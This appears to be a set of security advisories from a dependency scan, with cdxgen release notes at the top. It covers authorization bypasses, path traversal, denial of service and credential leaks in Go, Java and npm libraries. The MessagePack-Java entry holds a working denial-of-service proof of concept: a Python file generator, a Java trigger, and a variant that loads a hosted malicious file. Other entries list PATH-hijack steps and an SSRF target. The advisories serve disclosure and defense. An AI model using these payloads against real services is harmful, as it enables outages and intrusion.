This release focuses on Node.js dependency accuracy, server-side submission hardening, and CI/build maintenance.
lang:node
#3920 added WASM and WASI detection in the JS analyzer with test coverage updates. #3924 fixed npm component deduplication to preserve lockfile hashes when combining minified JS and package-lock inputs. #3925 now sets cdx:npm:package:development=true for npm devDependencies, improving metadata fidelity for policy and filtering workflows.
server and submission integration
#3922 enhanced Dependency-Track BOM submit flow with configurable autoCreate and isLatest, plus strict parent mode validation across CLI and server paths. #3918 hardened gitClone handling against malicious hook execution scenarios in server contexts.
build and release tooling
#3919 removed the dependency on the table package, reducing the runtime dependency surface and simplifying display/reporting internals. #3911 updated CycloneDX spec version references across release-relevant configs and entry points (package.json, deno.json, pyproject.toml, bin/cdxgen.js, lib/cli/index.js).
compliance and compatibility
#3926 normalized object-form license data to CycloneDX-compliant fields in getLicenses.
What kind of vulnerability is it? Who is impacted?
It is an Authorization Bypass resulting from Improper Input Validation of the HTTP/2 :path pseudo-header.
The gRPC-Go server was too lenient in its routing logic, accepting requests where the :path omitted the mandatory leading slash (e.g., Service/Method instead of /Service/Method). While the server successfully routed these requests to the correct handler, authorization interceptors (including the official grpc/authz package) evaluated the raw, non-canonical path string. Consequently, "deny" rules defined using canonical paths (starting with /) failed to match the incoming request, allowing it to bypass the policy if a fallback "allow" rule was present.
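The mismatch can be shown in a few lines of Go. This is a minimal sketch of the matching failure, not grpc/authz code; matchesDenyRule is a hypothetical stand-in for an interceptor comparing the raw path against a canonical deny rule:

```go
package main

import (
	"fmt"
	"strings"
)

// matchesDenyRule is a simplified stand-in for a path-based authz check:
// it compares the raw :path value against a canonical deny rule, the way
// an interceptor evaluating info.FullMethod would.
func matchesDenyRule(rawPath, denyRule string) bool {
	return rawPath == denyRule
}

func main() {
	deny := "/admin.Service/Wipe"

	// Canonical request: the deny rule matches and the call is blocked.
	fmt.Println(matchesDenyRule("/admin.Service/Wipe", deny)) // true

	// Non-canonical request (missing leading slash): the deny rule fails
	// to match, so a fallback "allow" rule would let the call through,
	// even though the server still routes it to the same handler.
	fmt.Println(matchesDenyRule("admin.Service/Wipe", deny)) // false

	// The patched behaviour: reject any :path without a leading slash
	// before authorization logic ever runs.
	fmt.Println(strings.HasPrefix("admin.Service/Wipe", "/")) // false -> reject with Unimplemented
}
```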
Who is impacted?
This affects gRPC-Go servers that meet both of the following criteria:
They use path-based authorization interceptors, such as the official RBAC implementation in google.golang.org/grpc/authz or custom interceptors relying on info.FullMethod or grpc.Method(ctx).
Their security policy contains specific "deny" rules for canonical paths but allows other requests by default (a fallback "allow" rule).
The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed :path headers directly to the gRPC server.
Patches
Has the problem been patched? What versions should users upgrade to?
Yes, the issue has been patched. The fix ensures that any request with a :path that does not start with a leading slash is immediately rejected with a codes.Unimplemented error, preventing it from reaching authorization interceptors or handlers with a non-canonical path string.
Users should upgrade to the following versions (or newer):
v1.79.3
The latest master branch.
It is recommended that all users employing path-based authorization (especially grpc/authz) upgrade as soon as the patch is available in a tagged release.
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
While upgrading is the most secure and recommended path, users can mitigate the vulnerability using one of the following methods:
1. Use a Validating Interceptor (Recommended Mitigation)
Add an "outermost" interceptor to your server that validates the path before any other authorization logic runs:
func pathValidationInterceptor(ctx context.Context, req any, info *grpc.UnaryServerInfo, handler grpc.UnaryHandler) (any, error) {
    if info.FullMethod == "" || info.FullMethod[0] != '/' {
        return nil, status.Errorf(codes.Unimplemented, "malformed method name")
    }
    return handler(ctx, req)
}

// Ensure this is the FIRST interceptor in your chain:
s := grpc.NewServer(
    grpc.ChainUnaryInterceptor(pathValidationInterceptor, authzInterceptor),
)
2. Infrastructure-Level Normalization
If your gRPC server is behind a reverse proxy or load balancer (such as Envoy, NGINX, or an L7 Cloud Load Balancer), ensure it is configured to enforce strict HTTP/2 compliance for pseudo-headers and reject or normalize requests where the :path header does not start with a leading slash.
3. Policy Hardening
Switch to a "default deny" posture in your authorization policies (explicitly listing all allowed paths and denying everything else) to reduce the risk of bypasses via malformed inputs.
The fix for GHSA-9h8m-3fm2-qjrq (CVE-2026-24051) changed the Darwin ioreg command to use an absolute path but left the BSD kenv command using a bare name, allowing the same PATH hijacking attack on BSD and Solaris platforms.
The execCommand helper at sdk/resource/host_id_exec.go uses exec.Command(name, arg...) which searches $PATH when the command name contains no path separator.
Affected platforms (per build tag in host_id_bsd.go:4): DragonFly BSD, FreeBSD, NetBSD, OpenBSD, Solaris.
The kenv path is reached when /etc/hostid does not exist (lines 38-40), which is common on FreeBSD systems.
Attack
Attacker has local access to a system running a Go application that imports go.opentelemetry.io/otel/sdk
Attacker places a malicious kenv binary earlier in $PATH
Application initializes OpenTelemetry resource detection at startup
hostIDReaderBSD.read() calls exec.Command("kenv", ...) which resolves to the malicious binary
Arbitrary code executes in the context of the application
The OpenTelemetry Go SDK in versions v1.20.0 through v1.39.0 is vulnerable to Path Hijacking (Untrusted Search Paths) on macOS/Darwin systems. The resource detection code in sdk/resource/host_id.go executes the ioreg system command using a search path. An attacker with the ability to locally modify the PATH environment variable can achieve Arbitrary Code Execution (ACE) within the context of the application.
Patches
This has been patched in d45961b, which was released with v1.40.0.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected range
<0.28.1
Fixed version
0.28.1
CVSS Score
8.4
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score
0.055%
EPSS Percentile
17th percentile
Description
Impact
When using a custom BuildKit frontend, the frontend can craft an API message that causes files to be written outside of the BuildKit state directory for the execution context.
Patches
The issue has been fixed in v0.28.1+
Workarounds
Issue requires using an untrusted BuildKit frontend set with #syntax or --build-arg BUILDKIT_SYNTAX. Using these options with a well-known frontend image like docker/dockerfile is not affected.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Insufficient validation of Git URL fragment subdir components (<url>#<ref>:<subdir>, docs) may allow access to files outside the checked-out Git repository root. Possible access is limited to files on the same mounted filesystem.
Patches
The issue has been fixed in version v0.28.1
Workarounds
The issue affects only builds that use Git URLs with a subpath component. Avoid building Dockerfiles from untrusted sources or using the subdir component from an untrusted Git repository where the subdir component could point to a symlink.
Authentication Bypass Using an Alternate Path or Channel
Affected range
<29.3.1
Fixed version
Not Fixed
CVSS Score
8.8
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS Score
0.008%
EPSS Percentile
1st percentile
Description
Summary
A security vulnerability has been detected that allows attackers to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low.
If you don't use AuthZ plugins, you are not affected.
Using a specially-crafted API request, an attacker could make the Docker daemon forward the request to an authorization plugin without the body. The authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it.
Anyone who depends on authorization plugins that introspect the request body to make access control decisions is potentially impacted.
Workarounds
If unable to update immediately:
Avoid using AuthZ plugins that rely on request body inspection for security decisions.
Restrict access to the Docker API to trusted parties, following the principle of least privilege.
A security vulnerability has been detected that allows plugins privilege validation to be bypassed during docker plugin install. Due to an error in the daemon's privilege comparison logic, the daemon may incorrectly accept a privilege set that differs from the one approved by the user.
Plugins that request exactly one privilege are also affected, because no comparison is performed at all.
Impact
If plugins are not in use, there is no impact.
When a plugin is installed, the daemon computes the privileges required by the plugin's configuration and compares them with the privileges approved during installation. A malicious plugin can exploit this bug so that the daemon accepts privileges that differ from what was intended to be approved.
Anyone who depends on the plugin installation approval flow as a meaningful security boundary is potentially impacted.
Depending on the privilege set involved, this may include highly sensitive plugin permissions such as broad device access.
For consideration: exploitation still requires a plugin to be installed from a malicious source, and Docker plugins are relatively uncommon. Docker Desktop also does not support plugins.
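A correct comparison has to treat the privilege sets as unordered and must never skip the check, including for single-element sets. The following is a sketch of such a comparison; Privilege and samePrivileges are illustrative types and helpers, not Docker's actual code:

```go
package main

import (
	"fmt"
	"sort"
)

// Privilege is a simplified stand-in for a plugin privilege entry.
type Privilege struct {
	Name   string
	Values []string
}

// samePrivileges compares the privileges approved by the user with the
// ones the plugin's config actually requires, independent of order and
// with no special case for single-element sets (the case the buggy
// daemon skipped entirely).
func samePrivileges(approved, required []Privilege) bool {
	if len(approved) != len(required) {
		return false
	}
	// Canonicalize each privilege to a sortable key, then compare the
	// sorted key lists element by element.
	key := func(p Privilege) string {
		vs := append([]string(nil), p.Values...)
		sort.Strings(vs)
		return fmt.Sprintf("%s=%v", p.Name, vs)
	}
	a := make([]string, 0, len(approved))
	r := make([]string, 0, len(required))
	for _, p := range approved {
		a = append(a, key(p))
	}
	for _, p := range required {
		r = append(r, key(p))
	}
	sort.Strings(a)
	sort.Strings(r)
	for i := range a {
		if a[i] != r[i] {
			return false
		}
	}
	return true
}

func main() {
	approved := []Privilege{{Name: "network", Values: []string{"host"}}}
	escalated := []Privilege{{Name: "device", Values: []string{"/dev/mem"}}}
	fmt.Println(samePrivileges(approved, approved))  // true
	fmt.Println(samePrivileges(approved, escalated)) // false: must be rejected
}
```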
Workarounds
If unable to update immediately:
Do not install plugins from untrusted sources
Carefully review all privileges requested during docker plugin install
Restrict access to the Docker daemon to trusted parties, following the principle of least privilege
Avoid relying on plugin privilege approval as the only control boundary for sensitive environments
Credits
Reported by Cody (c@wormhole.guru, PGP 0x9FA5B73E)
The SPDY/3 frame parser in spdystream does not validate
attacker-controlled counts and lengths before allocating memory. A
remote peer that can send SPDY frames to a service using spdystream can
cause the process to allocate gigabytes of memory with a small number of
malformed control frames, leading to an out-of-memory crash.
Three allocation paths in the receive side are affected:
SETTINGS entry count -- The SETTINGS frame reader reads a 32-bit numSettings from the payload and allocates a slice of that size
without checking it against the declared frame length. An attacker
can set numSettings to a value far exceeding the actual payload,
triggering a large allocation before any setting data is read.
Header count -- parseHeaderValueBlock reads a 32-bit numHeaders from the decompressed header block and allocates an http.Header map of that size with no upper bound.
Header field size -- Individual header name and value lengths are
read as 32-bit integers and used directly as allocation sizes with
no validation.
Because SPDY header blocks are zlib-compressed, a small on-the-wire
payload can decompress into attacker-controlled bytes that the parser
interprets as 32-bit counts and lengths. A single crafted frame is
enough to exhaust process memory.
Impact
Any program that accepts SPDY connections using spdystream -- directly
or through a dependent library -- is affected. A remote peer that can
send SPDY frames to the service can crash the process with a single
crafted SPDY control frame, causing denial of service.
v0.5.1 addresses the receive-side allocation bugs and adds related
hardening:
Core fixes:
SETTINGS entry-count validation -- The SETTINGS frame reader now
checks that numSettings is consistent with the declared frame
length (numSettings <= (length-4)/8) before allocating.
Header count limit -- parseHeaderValueBlock enforces a maximum
number of headers per frame (default: 1000).
Header field size limit -- Individual header name and value
lengths are checked against a per-field size limit (default: 1 MiB)
before allocation.
Connection closure on protocol error -- The connection read loop
now closes the underlying net.Conn when it encounters an InvalidControlFrame error, preventing further exploitation on the
same connection.
Additional hardening:
Write-side bounds checks -- All frame write methods now verify
that payloads fit within the 24-bit length field, preventing the
library from producing invalid frames.
Configurable limits:
Callers can adjust the defaults using NewConnectionWithOptions or
the lower-level spdy.NewFramerWithOptions with functional options: WithMaxControlFramePayloadSize, WithMaxHeaderFieldSize, and WithMaxHeaderCount.
Exposure of Sensitive Information to an Unauthorized Actor
Affected range
<1.8.6
Fixed version
1.8.6
CVSS Score
7.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS Score
0.015%
EPSS Percentile
3rd percentile
Description
HashiCorp's go-getter library up to v1.8.5 may allow arbitrary file reads on the file system during certain git operations through a maliciously crafted URL. This is fixed in go-getter v1.8.6. This vulnerability does not affect the go-getter/v2 branch and package.
Docker CLI for Windows searches for plugin binaries in C:\ProgramData\Docker\cli-plugins, a directory that does not exist by default. A low-privileged attacker can create this directory and place malicious CLI plugin binaries (docker-compose.exe, docker-buildx.exe, etc.) that are executed when a victim user opens Docker Desktop or invokes Docker CLI plugin features, and allow privilege-escalation if the docker CLI is executed as a privileged user.
This issue affects Docker CLI through v29.1.5 (fixed in v29.2.0). It impacts Windows binaries acting as a CLI plugin manager via the [github.com/docker/cli/cli-plugins/manager](https://pkg.go.dev/github.com/docker/cli@v29.1.5+incompatible/cli-plugins/manager) package, which is consumed by downstream projects such as Docker Compose.
Docker Compose became affected starting in v2.31.0, when it incorporated the relevant CLI plugin manager code (see docker/compose#12300), and is fixed in v5.1.0.
This issue does not impact non-Windows binaries or projects that do not use the plugin manager code.
Patches
Fixed version starts with 29.2.0
This issue was fixed in docker/cli@1375933 (docker/cli#6713), which removed %PROGRAMDATA%\Docker\cli-plugins from the list of paths used for plugin-discovery on Windows.
Function api.ParseJSONRequest currently splits (via a call to strings.Split) an optionally-provided OID (which is untrusted data) on periods. Similarly, function api.getContentType splits the Content-Type header (which is also untrusted data) on an application string.
As a result, in the face of a malicious request with either an excessively long OID in the payload containing many period characters or a malformed Content-Type header, a call to api.ParseJSONRequest or api.getContentType incurs allocations of O(n) bytes (where n stands for the length of the function's argument). Relevant weakness: CWE-405: Asymmetric Resource Consumption (Amplification)
Patches
Upgrade to v2.0.3.
Workarounds
There are no workarounds with the service itself. If the service is behind a load balancer, configure the load balancer to reject excessively large requests.
Decrypting a JSON Web Encryption (JWE) object will panic if the alg field indicates a key wrapping algorithm (one ending in KW, with the exception of A128GCMKW, A192GCMKW, and A256GCMKW) and the encrypted_key field is empty. The panic happens when cipher.KeyUnwrap() in key_wrap.go attempts to allocate a slice with a zero or negative length based on the length of the encrypted_key.
This code path is reachable from ParseEncrypted() / ParseEncryptedJSON() / ParseEncryptedCompact() followed by Decrypt() on the resulting object. Note that the parse functions take a list of accepted key algorithms. If the accepted key algorithms do not include any key wrapping algorithms, parsing will fail and the application will be unaffected.
This panic is also reachable by calling cipher.KeyUnwrap() directly with any ciphertext parameter less than 16 bytes long, but calling this function directly is less common.
Panics can lead to denial of service.
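The prevalidation suggested below can be sketched as follows. checkWrappedKey is a hypothetical helper: the 16-byte minimum comes from this advisory, and the 8-byte alignment reflects the AES Key Wrap block structure (n+1 eight-byte blocks):

```go
package main

import "fmt"

// checkWrappedKey rejects encrypted_key values that would drive a key
// unwrap toward a zero- or negative-length slice allocation: anything
// shorter than 16 bytes, or not a multiple of the 8-byte block size.
func checkWrappedKey(encryptedKey []byte) error {
	if len(encryptedKey) < 16 || len(encryptedKey)%8 != 0 {
		return fmt.Errorf("invalid wrapped key length %d", len(encryptedKey))
	}
	return nil
}

func main() {
	fmt.Println(checkWrappedKey(nil))              // rejected: empty encrypted_key
	fmt.Println(checkWrappedKey(make([]byte, 8)))  // rejected: too short to unwrap
	fmt.Println(checkWrappedKey(make([]byte, 24))) // accepted: plausible wrapped 128-bit key
}
```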
Fixed In
v4.1.4 and v3.0.5
Workarounds
If the list of keyAlgorithms passed to ParseEncrypted() / ParseEncryptedJSON() / ParseEncryptedCompact() does not include key wrapping algorithms (those ending in KW), your application is unaffected.
If your application uses key wrapping, you can prevalidate the JWE objects to ensure the encrypted_key field is nonempty. If your application accepts JWE Compact Serialization, apply that validation to the corresponding field of that serialization (the data between the first and second .).
Thanks
Thanks to Datadog's Security team for finding this issue.
A denial-of-service vulnerability exists in MessagePack for Java when deserializing .msgpack files containing EXT32 objects with attacker-controlled payload lengths. While MessagePack-Java parses extension headers lazily, it later trusts the declared EXT payload length when materializing the extension data. When ExtensionValue.getData() is invoked, the library attempts to allocate a byte array of the declared length without enforcing any upper bound. A malicious .msgpack file of only a few bytes can therefore trigger unbounded heap allocation, resulting in JVM heap exhaustion, process termination, or service unavailability. This vulnerability is triggered during model loading / deserialization, making it a model format vulnerability suitable for remote exploitation.
PoC
import msgpack
import struct
import os
OUTPUT_DIR = "bombs"
os.makedirs(OUTPUT_DIR, exist_ok=True)
# EXT format: fixext / ext8 / ext16 / ext32
# ext32 allows attacker-controlled length (uint32)
length = 1
step = 10_000_000
while True:
    try:
        # EXT32: 0xC9 | length (4 bytes) | type (1 byte)
        header = b'\xC9' + struct.pack(">I", length) + b'\x01'
        payload = b'A'  # actual data tiny
        data = header + payload
        fname = f"{OUTPUT_DIR}/ext_length_{length}.msgpack"
        with open(fname, "wb") as f:
            f.write(data)
        print(f"[+] Generated EXT bomb with declared length={length}")
        length += step
    except Exception as e:
        print("[!] Stopped:", e)
        break
// Main.java
import org.msgpack.core.MessagePack;
import org.msgpack.core.MessageUnpacker;
import org.msgpack.value.ExtensionValue;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Main {
    public static void main(String[] args) throws Exception {
        byte[] data = Files.readAllBytes(
            Paths.get("ext_length_470000001.msgpack")
        );
        MessageUnpacker unpacker =
            MessagePack.newDefaultUnpacker(data);
        ExtensionValue ext =
            unpacker.unpackValue().asExtensionValue();
        // Vulnerability trigger:
        byte[] payload = ext.getData();
        System.out.println(payload.length);
    }
}
Compile
javac -cp msgpack-core-0.9.8.jar Main.java
Run (with limited heap)
java -Xmx256m -cp .:msgpack-core-0.9.8.jar Main
Observed Result:
Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
at org.msgpack.core.MessageUnpacker.readPayload(...)
at org.msgpack.core.MessageUnpacker.unpackValue(...)
A remote variant of the same PoC (fetching the hosted file over HTTPS, e.g. in jshell):
var u = new java.net.URL("https://huggingface.co/Blackbloodhacker/msgpack/resolve/main/ext_length_470000001.msgpack");
var d = u.openStream().readAllBytes();
var up = org.msgpack.core.MessagePack.newDefaultUnpacker(d);
up.unpackValue().asExtensionValue().getData();
Run:
java -Xmx256m -cp .:msgpack-core-0.9.8.jar Main
A remotely hosted model file on Hugging Face can cause denial of service when loaded by a Java-based consumer.
This vulnerability enables a remote denial-of-service attack against applications that deserialize untrusted .msgpack model files using MessagePack for Java. A specially crafted but syntactically valid .msgpack file containing an EXT32 object with an attacker-controlled, excessively large payload length can trigger unbounded memory allocation during deserialization. When the model file is loaded, the library trusts the declared length metadata and attempts to allocate a byte array of that size, leading to rapid heap exhaustion, excessive garbage collection, or immediate JVM termination with an OutOfMemoryError. The attack requires no malformed bytes, user interaction, or elevated privileges and can be exploited remotely in real-world environments such as model registries, inference services, CI/CD pipelines, and cloud-based model hosting platforms that accept or fetch .msgpack artifacts. Because the malicious file is extremely small yet valid, it can bypass basic validation and scanning mechanisms, resulting in complete service unavailability and potential cascading failures in production systems.
A vulnerability has been identified in which a maliciously crafted .idx file can cause asymmetric memory consumption, potentially exhausting available memory and resulting in a Denial of Service (DoS) condition.
Exploitation requires write access to the local repository's .git directory, in order to create or alter existing .idx files.
Patches
Users should upgrade to v5.17.1, or the latest v6 pseudo-version, in order to mitigate this vulnerability.
Credit
The go-git maintainers thank @kq5y for finding and reporting this issue privately to the go-git project.
Insufficiently Protected Credentials
Affected range
<=5.17.2
Fixed version
5.18.0
CVSS Score
4.7
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
Description
Impact
go-git may leak HTTP authentication credentials when following redirects during smart-HTTP clone and fetch operations.
If a remote repository responds to the initial /info/refs request with a redirect to a different host, go-git updates the session endpoint to the redirected location and reuses the original authentication for subsequent requests. This can result in the credentials (e.g. Authorization headers) being sent to an unintended host.
An attacker controlling or influencing the redirect target can capture these credentials and potentially reuse them to access the victim’s repositories or other resources, depending on the scope of the credential.
Clients using go-git exclusively with trusted remotes (for example, GitHub or GitLab), and over a secure HTTPS connection, are not affected by this issue. The risk arises when interacting with untrusted or misconfigured Git servers, or when using unsecured HTTP connections, which is not recommended. Such configurations also expose clients to a broader class of security risks beyond this issue, including credential interception and tampering of repository data.
Patches
Users should upgrade to v5.18.0, or v6.0.0-alpha.2, in order to mitigate this vulnerability. Versions prior to v5 are likely also affected; users are recommended to upgrade to a supported go-git version.
The patched versions add support for configuring followRedirects. In line with upstream behaviour, the default is now initial, while users can opt into FollowRedirects or NoFollowRedirects programmatically.
Credit
Thanks to @celinke97, @N0zoM1z0 and @AyushParkara for their three separate reports, each finding and reporting this issue privately to the go-git project. 🙇
Improper Validation of Integrity Check Value
Affected range
<=5.16.4
Fixed version
5.16.5
CVSS Score
4.3
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
EPSS Score
0.007%
EPSS Percentile
1st percentile
Description
Impact
A vulnerability was discovered in go-git whereby data integrity values for .pack and .idx files were not properly verified. This resulted in go-git potentially consuming corrupted files, which would likely result in unexpected errors such as object not found.
For context, clients fetch packfiles from upstream Git servers. Those files contain a checksum of their contents, so that clients can perform integrity checks before consuming it. The pack indexes (.idx) are generated locally by go-git, or the git cli, when new .pack files are received and processed. The integrity checks for both files were not being verified correctly.
Note that the lack of verification of the packfile checksum has no impact on the trust relationship between the client and server, which is enforced based on the protocol being used (e.g. TLS in the case of https:// or known hosts for ssh://). In other words, the packfile checksum verification does not provide any security benefits when connecting to a malicious or compromised Git server.
Patches
Users should upgrade to v5.16.5, or the latest v6 pseudo-version, in order to mitigate this vulnerability.
Workarounds
In case updating to a fixed version of go-git is not possible, users can run git fsck from the git cli to check for data corruption on a given repository.
Credit
Thanks @N0zoM1z0 for finding and reporting this issue privately to the go-git project.
Improper Validation of Array Index
Affected range
<=5.17.0
Fixed version
5.17.1
CVSS Score
2.8
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L
EPSS Score
0.014%
EPSS Percentile
2nd percentile
Description
Impact
go-git’s index decoder for format version 4 fails to validate the path name prefix length before applying it to the previously decoded path name. A maliciously crafted index file can trigger an out-of-bounds slice operation, resulting in a runtime panic during normal index parsing.
This issue only affects Git index format version 4. Earlier formats (go-git supports only v2 and v3) are not vulnerable to this issue.
An attacker able to supply a crafted .git/index file can cause applications using go-git to panic while reading the index. If the application does not recover from panics, this results in process termination, leading to a denial-of-service (DoS) condition.
Exploitation requires the ability to modify or inject a Git index file within the local repository on disk. This typically implies write access to the .git directory.
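The missing bounds check can be sketched as follows. applyPrefixCompression is a simplified, hypothetical model of v4 prefix compression (strip N bytes from the previous path, append a suffix), not go-git's decoder:

```go
package main

import "fmt"

// applyPrefixCompression reconstructs a v4-style compressed path name:
// strip stripLen bytes from the end of the previous path, then append
// the new suffix. The bounds check is the one the unpatched decoder
// lacked; without it, a crafted stripLen slices out of range and panics.
func applyPrefixCompression(prevPath string, stripLen int, suffix string) (string, error) {
	if stripLen < 0 || stripLen > len(prevPath) {
		return "", fmt.Errorf("strip length %d out of range for path of %d bytes", stripLen, len(prevPath))
	}
	return prevPath[:len(prevPath)-stripLen] + suffix, nil
}

func main() {
	p, err := applyPrefixCompression("src/main.go", len("main.go"), "util.go")
	fmt.Println(p, err) // src/util.go <nil>

	// A malicious index declaring a strip length longer than the
	// previous path is rejected instead of panicking.
	_, err = applyPrefixCompression("src/main.go", 999, "x")
	fmt.Println(err != nil) // true
}
```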
Patches
Users should upgrade to v5.17.1, or the latest v6 pseudo-version, in order to mitigate this vulnerability.
Credit
go-git maintainers thank @kq5y for finding and reporting this issue privately to the go-git project.
/api/v1/index/retrieve supports retrieving a public key via a user-provided URL, allowing attackers to trigger SSRF to arbitrary internal services.
Since the SSRF can only trigger GET requests, the request cannot mutate state. The response from the GET request is not returned to the caller, so data exfiltration is not possible. A malicious actor could attempt to probe an internal network through Blind SSRF.
Impact
SSRF to cloud metadata (169.254.169.254)
SSRF to internal Kubernetes APIs
SSRF to any service accessible from Fulcio's network
Patches
Upgrade to v1.5.0. Note that this is a breaking change to the search API and fully disables lookups by URL. If you require this feature, please reach out and we can discuss alternatives.
Workarounds
Disable the search endpoint with --enable_retrieve_api=false.
NULL Pointer Dereference
Affected range
<=1.4.3
Fixed version
1.5.0
CVSS Score
5.3
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
EPSS Score
0.016%
EPSS Percentile
4th percentile
Description
Summary
Rekor’s cose v0.0.1 entry implementation can panic on attacker-controlled input when canonicalizing a proposed entry with an empty spec.message. validate() returns nil (success) when message is empty, leaving sign1Msg uninitialized, and Canonicalize() later dereferences v.sign1Msg.Payload.
Impact
A malformed proposed entry of the cose/v0.0.1 type can cause a panic on a thread within the Rekor process. The thread is recovered so the client receives a 500 error message and service still continues, so the availability impact of this is minimal.
A Cosign bundle can be crafted to successfully verify an artifact even if the embedded Rekor entry does not reference the artifact's digest, signature or public key. When verifying a Rekor entry, Cosign verifies the Rekor entry signature, and also compares the artifact's digest, the user's public key from either a Fulcio certificate or provided by the user, and the artifact signature to the Rekor entry contents. Without these comparisons, Cosign would accept any response from Rekor as valid. A malicious actor that has compromised a user's identity or signing key could construct a valid Cosign bundle by including any arbitrary Rekor entry, thus preventing the user from being able to audit the signing event.
This vulnerability only affects users that provide a trusted root via --trusted-root or when fetched automatically from a TUF repository, when no trusted key material is provided via SIGSTORE_REKOR_PUBLIC_KEY. When using the default flag values in Cosign v3 to sign and verify (--use-signing-config=true and --new-bundle-format=true for signing, --new-bundle-format=true for verification), users are unaffected. Cosign v2 users are affected using the default flag values.
This issue had previously been fixed in GHSA-8gw7-4j42-w388 but recent refactoring caused a regression. We have added testing to prevent a future regression.
Upgrade to Cosign v2.6.2 or Cosign v3.0.4. This does not affect Cosign v1.
Workarounds
You can provide trusted key material via a set of flags under certain conditions. The simplest fix is to upgrade to the latest Cosign v2 or v3 release.
Note that the example below works for cosign verify, cosign verify-blob, cosign verify-blob-attestation, and cosign verify-attestation.
SIGSTORE_REKOR_PUBLIC_KEY=<path to Rekor pub key> cosign verify-blob --use-signing-config=false --new-bundle-format=false --bundle=<path to bundle> <artifact>
uuid 13.0.0 (npm)
pkg:npm/uuid@13.0.0
Improper Validation of Specified Index, Position, or Offset in Input
v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset).
By contrast, v4, v1, and v7 explicitly throw RangeError on invalid bounds.
This inconsistency allows silent partial writes into caller-provided buffers.
Affected code
src/v35.ts (v3/v5 path) writes buf[offset + i] without bounds validation.
src/v6.ts writes buf[offset + i] without bounds validation.
Reproducible PoC
cd /home/StrawHat/uuid
npm ci
npm run build
node --input-type=module -e "import {v4,v5,v6} from './dist-node/index.js';const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';for (const [name,fn] of [ ['v4',()=>v4({},new Uint8Array(8),4)], ['v5',()=>v5('x',ns,new Uint8Array(8),4)], ['v6',()=>v6({},new Uint8Array(8),4)],]) { try { fn(); console.log(name,'NO_THROW'); } catch(e){ console.log(name,'THREW',e.name); }}"
Observed:
v4 THREW RangeError
v5 NO_THROW
v6 NO_THROW
Example partial overwrite evidence captured during audit:
An issue exists in the EventStream header decoder in AWS SDK for Go v2 in versions predating 2026-03-23. An actor can send a malformed EventStream response frame containing a crafted header value type byte outside the valid range, which can cause the host process to terminate.
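The class of fix implied here can be sketched as a range check on the type byte before the decoder acts on it. validHeaderType is a hypothetical helper; the 0-9 range reflects the event stream encoding's ten header value types and is an assumption, not code from the SDK:

```go
package main

import "fmt"

// The event stream encoding defines ten header value types (0-9:
// bool-true, bool-false, byte, short, integer, long, byte-array,
// string, timestamp, uuid). validHeaderType rejects any other type
// byte so a malformed frame fails cleanly instead of crashing the
// process.
func validHeaderType(t byte) bool {
	return t <= 9
}

func main() {
	fmt.Println(validHeaderType(7))    // true: a string header
	fmt.Println(validHeaderType(0xFF)) // false: fail the frame, not the process
}
```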
This issue has been addressed in versions 2026-03-23 and above. We recommend upgrading to the latest version and ensuring any forked or derivative code is patched to incorporate the new fixes.
Workarounds
Not Applicable
References
If you have any questions or comments about this advisory, we ask that you contact [AWS/Amazon] Security via our vulnerability reporting page or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.
helm.sh/helm/v3 3.19.2 (golang)
pkg:golang/helm.sh/helm/v3@3.19.2
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Helm is a package manager for Charts for Kubernetes. In Helm versions <=3.20.1 and <4.1.3, a specially crafted Chart will cause helm pull --untar [chart URL | repo/chartname] to write the Chart's contents to the immediate output directory (defaulting to the current working directory, or as given by the --destination and --untardir flags), rather than to the expected output directory suffixed by the chart's name.
Impact
The bug enables writing the Chart's contents (unpackaged/untar'ed) to the output directory <output dir>/, instead of the expected <output dir>/<chart name>/, potentially overwriting the contents of the targeted directory.
Note: a chart name containing POSIX dot-dot, or dot-dot and slashes (as if referring to parent directories), does not resolve beyond the output directory, as designed.
Patches
This issue has been resolved in Helm v3.20.2 and v4.1.3.
A Chart with an unexpected name (one specified as "." or ".."), or a Chart name that results in a non-unique directory, will be rejected.
Workarounds
Ensure the name of the Chart does not contain the POSIX special directory references, i.e. dot-dot ("..") or dot ("."). In addition, ensuring that the pull --untar flag (or equivalent SDK option) refers to a unique/empty output directory prevents chart extraction from inadvertently overwriting existing files within the specified directory.
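The patched behavior can be sketched as a name check applied before untarring. This is an illustrative function, not Helm's actual implementation; it shows the kind of rule the patch describes (reject "." and "..", and reject names containing path separators, so extraction always lands in a unique <output dir>/<chart name>/ directory):

```go
package main

import (
	"fmt"
	"strings"
)

// safeChartDirName is a hypothetical sketch of the validation described in
// the advisory: the chart name must itself be a single, well-formed
// directory component before it is used as the extraction target.
func safeChartDirName(name string) (string, error) {
	if name == "" || name == "." || name == ".." {
		return "", fmt.Errorf("invalid chart name %q", name)
	}
	if strings.ContainsAny(name, `/\`) {
		return "", fmt.Errorf("chart name %q must not contain path separators", name)
	}
	return name, nil
}

func main() {
	fmt.Println(safeChartDirName("nginx")) // nginx <nil>
	_, err := safeChartDirName("..")
	fmt.Println(err != nil) // true
}
```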
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected range
<=1.10.3
Fixed version
1.10.4
CVSS Score
5.8
CVSS Vector
